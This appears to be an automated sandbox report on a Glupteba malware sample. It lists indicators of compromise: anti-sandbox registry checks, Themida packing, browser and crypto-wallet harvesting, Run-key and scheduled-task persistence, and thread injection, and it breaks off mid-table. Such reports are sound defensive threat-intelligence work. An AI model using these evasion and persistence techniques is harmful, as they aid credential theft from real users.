glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

Processes:

eshLa6UbkkoXovQ5C5WvNZGt.exeEsplorarne.exe.comt7q7k6tJCnKfUzC0JhUMWzyH.exeX_0Ewh1KUS9BEn0y8fuUPvNW.exeiL0yuFcDXwk212Jhut9SI_D7.exeXLIX8_JGSKQGAWhbdi3LZOu9.exeX4ZtF54lpE0bihtejzoN5wga.exeEsplorarne.exe.com562D.exeXSXAonP7RSV0ep9KE9Bx9GGY.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	eshLa6UbkkoXovQ5C5WvNZGt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	t7q7k6tJCnKfUzC0JhUMWzyH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	eshLa6UbkkoXovQ5C5WvNZGt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	X_0Ewh1KUS9BEn0y8fuUPvNW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	iL0yuFcDXwk212Jhut9SI_D7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	XLIX8_JGSKQGAWhbdi3LZOu9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	X4ZtF54lpE0bihtejzoN5wga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	X_0Ewh1KUS9BEn0y8fuUPvNW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	iL0yuFcDXwk212Jhut9SI_D7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	562D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	XLIX8_JGSKQGAWhbdi3LZOu9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	X4ZtF54lpE0bihtejzoN5wga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	XSXAonP7RSV0ep9KE9Bx9GGY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	XSXAonP7RSV0ep9KE9Bx9GGY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	t7q7k6tJCnKfUzC0JhUMWzyH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	562D.exe

Loads dropped DLL 17 IoCs

Processes:

083SMkqix3FqkMg85qpCK4MO.exeB1DSbHQ4kUH40QHuC2yUXfLG.tmpmask_svc.exeCleaner Installation.exeWEATHER Manager.tmpVPN.tmpMediaBurner2.tmprundll32.exeADKwMULHmhitEvLeGmKUceKo.exeDxRHLdhJwj2u6sxzhWkmB7cv.tmpEsplorarne.exe.comMsiExec.exe

pid	process
3472	083SMkqix3FqkMg85qpCK4MO.exe
3844	B1DSbHQ4kUH40QHuC2yUXfLG.tmp
3844	B1DSbHQ4kUH40QHuC2yUXfLG.tmp
5920	mask_svc.exe
5920	mask_svc.exe
5864	Cleaner Installation.exe
4936	WEATHER Manager.tmp
4936	WEATHER Manager.tmp
5252	VPN.tmp
5252	VPN.tmp
5896	MediaBurner2.tmp
2096	rundll32.exe
6704	ADKwMULHmhitEvLeGmKUceKo.exe
8168	DxRHLdhJwj2u6sxzhWkmB7cv.tmp
8168	DxRHLdhJwj2u6sxzhWkmB7cv.tmp
5612	Esplorarne.exe.com
6768	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\2zjnGup_q5N69USduMS__gOT.exe	themida
C:\Users\Admin\Documents\XLIX8_JGSKQGAWhbdi3LZOu9.exe	themida
C:\Users\Admin\Documents\X4ZtF54lpE0bihtejzoN5wga.exe	themida
C:\Users\Admin\Documents\XLIX8_JGSKQGAWhbdi3LZOu9.exe	themida
C:\Users\Admin\Documents\2zjnGup_q5N69USduMS__gOT.exe	themida
C:\Users\Admin\Documents\X4ZtF54lpE0bihtejzoN5wga.exe	themida
behavioral3/memory/3368-215-0x0000000000F20000-0x0000000000F21000-memory.dmp	themida
behavioral3/memory/4400-218-0x00000000009D0000-0x00000000009D1000-memory.dmp	themida
C:\Users\Admin\Documents\eshLa6UbkkoXovQ5C5WvNZGt.exe	themida
C:\Users\Admin\Documents\XSXAonP7RSV0ep9KE9Bx9GGY.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

6565577.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6565577.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 10 IoCs

evasion trojan

System Information Discovery

Processes:

XLIX8_JGSKQGAWhbdi3LZOu9.exeX4ZtF54lpE0bihtejzoN5wga.exeXSXAonP7RSV0ep9KE9Bx9GGY.exeX_0Ewh1KUS9BEn0y8fuUPvNW.exeEsplorarne.exe.comt7q7k6tJCnKfUzC0JhUMWzyH.exe562D.exeeshLa6UbkkoXovQ5C5WvNZGt.exeiL0yuFcDXwk212Jhut9SI_D7.exeEsplorarne.exe.com

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XLIX8_JGSKQGAWhbdi3LZOu9.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	X4ZtF54lpE0bihtejzoN5wga.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XSXAonP7RSV0ep9KE9Bx9GGY.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	X_0Ewh1KUS9BEn0y8fuUPvNW.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	t7q7k6tJCnKfUzC0JhUMWzyH.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	562D.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	eshLa6UbkkoXovQ5C5WvNZGt.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iL0yuFcDXwk212Jhut9SI_D7.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Esplorarne.exe.com

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Cleaner Installation.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\B:	Cleaner Installation.exe
File opened (read-only)	\??\M:	Cleaner Installation.exe
File opened (read-only)	\??\N:	Cleaner Installation.exe
File opened (read-only)	\??\P:	Cleaner Installation.exe
File opened (read-only)	\??\Y:	Cleaner Installation.exe
File opened (read-only)	\??\E:	Cleaner Installation.exe
File opened (read-only)	\??\T:	Cleaner Installation.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	Cleaner Installation.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\H:	Cleaner Installation.exe
File opened (read-only)	\??\J:	Cleaner Installation.exe
File opened (read-only)	\??\R:	Cleaner Installation.exe
File opened (read-only)	\??\W:	Cleaner Installation.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	Cleaner Installation.exe
File opened (read-only)	\??\O:	Cleaner Installation.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	Cleaner Installation.exe
File opened (read-only)	\??\V:	Cleaner Installation.exe
File opened (read-only)	\??\X:	Cleaner Installation.exe
File opened (read-only)	\??\Z:	Cleaner Installation.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	Cleaner Installation.exe
File opened (read-only)	\??\I:	Cleaner Installation.exe
File opened (read-only)	\??\Q:	Cleaner Installation.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\F:	Cleaner Installation.exe
File opened (read-only)	\??\S:	Cleaner Installation.exe
File opened (read-only)	\??\U:	Cleaner Installation.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
2	ipinfo.io
36	ip-api.com
249	ipinfo.io
289	geoiptool.com
110	ipinfo.io
156	ipinfo.io
383	ipinfo.io
530	ipinfo.io
245	ipinfo.io
269	ipinfo.io
29	ipinfo.io
35	ipinfo.io
153	ipinfo.io
167	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

Processes:

XLIX8_JGSKQGAWhbdi3LZOu9.exeX4ZtF54lpE0bihtejzoN5wga.exeXSXAonP7RSV0ep9KE9Bx9GGY.exeeshLa6UbkkoXovQ5C5WvNZGt.exeEsplorarne.exe.comX_0Ewh1KUS9BEn0y8fuUPvNW.exeiL0yuFcDXwk212Jhut9SI_D7.exet7q7k6tJCnKfUzC0JhUMWzyH.exeEsplorarne.exe.com562D.exe

pid	process
3368	XLIX8_JGSKQGAWhbdi3LZOu9.exe
4400	X4ZtF54lpE0bihtejzoN5wga.exe
940	XSXAonP7RSV0ep9KE9Bx9GGY.exe
4704	eshLa6UbkkoXovQ5C5WvNZGt.exe
6548	Esplorarne.exe.com
6728	X_0Ewh1KUS9BEn0y8fuUPvNW.exe
6888	iL0yuFcDXwk212Jhut9SI_D7.exe
7012	t7q7k6tJCnKfUzC0JhUMWzyH.exe
6936	Esplorarne.exe.com
6148	562D.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

E9uxgSdUeExu0bBngzBh_uQe.exeQj3Vdd8aLsc3UBukHlh8rpoV.exeHSVqsrxEPqSjn6UotLlealWj.exeDwtRtrKcrNNzwRu4T2lxgQFY.exeo9ec8i3AuTv895w9Wwh2Xg7O.exefb1MwdKd5fEQv7VBUE8qPTBH.exeEsplorarne.exe.comschtasks.exe

description	pid	process	target process
PID 3984 set thread context of 1468	3984	E9uxgSdUeExu0bBngzBh_uQe.exe	E9uxgSdUeExu0bBngzBh_uQe.exe
PID 4508 set thread context of 3236	4508	Qj3Vdd8aLsc3UBukHlh8rpoV.exe	Qj3Vdd8aLsc3UBukHlh8rpoV.exe
PID 4336 set thread context of 2716	4336		ACRS_7uZWaTP54klYeVeFN9k.exe
PID 4300 set thread context of 2016	4300	HSVqsrxEPqSjn6UotLlealWj.exe	HSVqsrxEPqSjn6UotLlealWj.exe
PID 4832 set thread context of 3164	4832	DwtRtrKcrNNzwRu4T2lxgQFY.exe	DwtRtrKcrNNzwRu4T2lxgQFY.exe
PID 6892 set thread context of 6224	6892	o9ec8i3AuTv895w9Wwh2Xg7O.exe	o9ec8i3AuTv895w9Wwh2Xg7O.exe
PID 6712 set thread context of 8116	6712	fb1MwdKd5fEQv7VBUE8qPTBH.exe	Esplorarne.exe.com
PID 6744 set thread context of 3224	6744	Esplorarne.exe.com	_xN54NnZnomRPATzFDYJ4i8H.exe
PID 7712 set thread context of 4360	7712	schtasks.exe	EUkgfe621oxW1Cxq9DPTgOif.exe

Drops file in Program Files directory 20 IoCs

Processes:

Dz3uQK1CslN0GEUk3d36pfch.exeSetup.exeCor5FBLHqNIlclEqub8T9FPt.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	Dz3uQK1CslN0GEUk3d36pfch.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	Dz3uQK1CslN0GEUk3d36pfch.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe	Setup.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	Cor5FBLHqNIlclEqub8T9FPt.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	Dz3uQK1CslN0GEUk3d36pfch.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	Dz3uQK1CslN0GEUk3d36pfch.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	Dz3uQK1CslN0GEUk3d36pfch.exe

Drops file in Windows directory 1 IoCs

Processes:

WerFault.exe

description ioc process

File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Program crash 36 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4752	4480	WerFault.exe	yRMdFeafclg2dc1Ry1n9sNsz.exe
3048	3084	WerFault.exe	woaKuS0Fa4P4IoV0phcyqAh5.exe
1544	3544	WerFault.exe	Wd5nvHmhtHnI5kFLdztgjHb9.exe
2064	3208	WerFault.exe	OgKA_pM_PTN4I5VVgtdfwxiQ.exe
3544	4276	WerFault.exe	4ec0EfJ26Oi9LMXwE6FcxxsD.exe
5256	2096	WerFault.exe	czcywb1fZDEdgFzt1mPKkXQl.exe
5368	4036	WerFault.exe	3i32jFwvGUsnagmBNZ6q5sdi.exe
5504	4564	WerFault.exe	NrZsYboOALPPtV9yFLrG31O6.exe
5440	912	WerFault.exe	rQI6pu_9npeQN6pi69yyeMWJ.exe
1208	5620	WerFault.exe	runvd.exe
912	4116	WerFault.exe	5448599.exe
6508	5952	WerFault.exe	zhaoy-game.exe
6544	1592	WerFault.exe	askinstall53.exe
7196	3684	WerFault.exe	EE98.exe
7852	6880	WerFault.exe	Ko33QUVAALpOh1b1A7sT3KaE.exe
7524	6720	WerFault.exe	6FWmm9wpbXfJihzhNLJ_cHvs.exe
8032	7160	WerFault.exe	EnUah771OdJtP44Bw1RSEYBc.exe
688	6688	WerFault.exe	8Ryys6MULaAOMhueUmcwsYqm.exe
5832	7096	WerFault.exe	XjldV96ttY2QjDgOTTvBY1au.exe
7948	3228	WerFault.exe	3058653.exe
7284	6560	WerFault.exe	ExHMKB1suxEclJITKzN91asY.exe
3840	7260	WerFault.exe	rundll32.exe
7928	7260	WerFault.exe	rundll32.exe
2860	5388	WerFault.exe	4549539.exe
6556	3536	WerFault.exe	7760695.exe
6160	8140	WerFault.exe	5608748.exe
3724	7196	WerFault.exe	5757479.exe
3428	2408	WerFault.exe	AB62.exe
1224	5988	WerFault.exe	explorer.exe
6880	1776	WerFault.exe	GcleanerEU.exe
7184	5712	WerFault.exe	TrustedInstaller.exe
7292	2284	WerFault.exe	anyname.exe
2460	2260	WerFault.exe	gcleaner.exe
5464	820	WerFault.exe	msedge.exe
3084	7860	WerFault.exe	msedge.exe
5744	6980	WerFault.exe	msedge.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

o9ec8i3AuTv895w9Wwh2Xg7O.exeE9uxgSdUeExu0bBngzBh_uQe.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	o9ec8i3AuTv895w9Wwh2Xg7O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E9uxgSdUeExu0bBngzBh_uQe.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E9uxgSdUeExu0bBngzBh_uQe.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E9uxgSdUeExu0bBngzBh_uQe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	o9ec8i3AuTv895w9Wwh2Xg7O.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	o9ec8i3AuTv895w9Wwh2Xg7O.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Esplorarne.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Esplorarne.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4008	schtasks.exe
7672	schtasks.exe
4396	schtasks.exe
680	schtasks.exe
5328	schtasks.exe
7392	schtasks.exe
6552	schtasks.exe
3952	schtasks.exe
7712	schtasks.exe
3904	schtasks.exe
2752	schtasks.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

7140 timeout.exe

pid	process
7140	timeout.exe

Enumerates system info in registry 2 TTPs 38 IoCs

Query Registry

System Information Discovery

Processes:

WerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
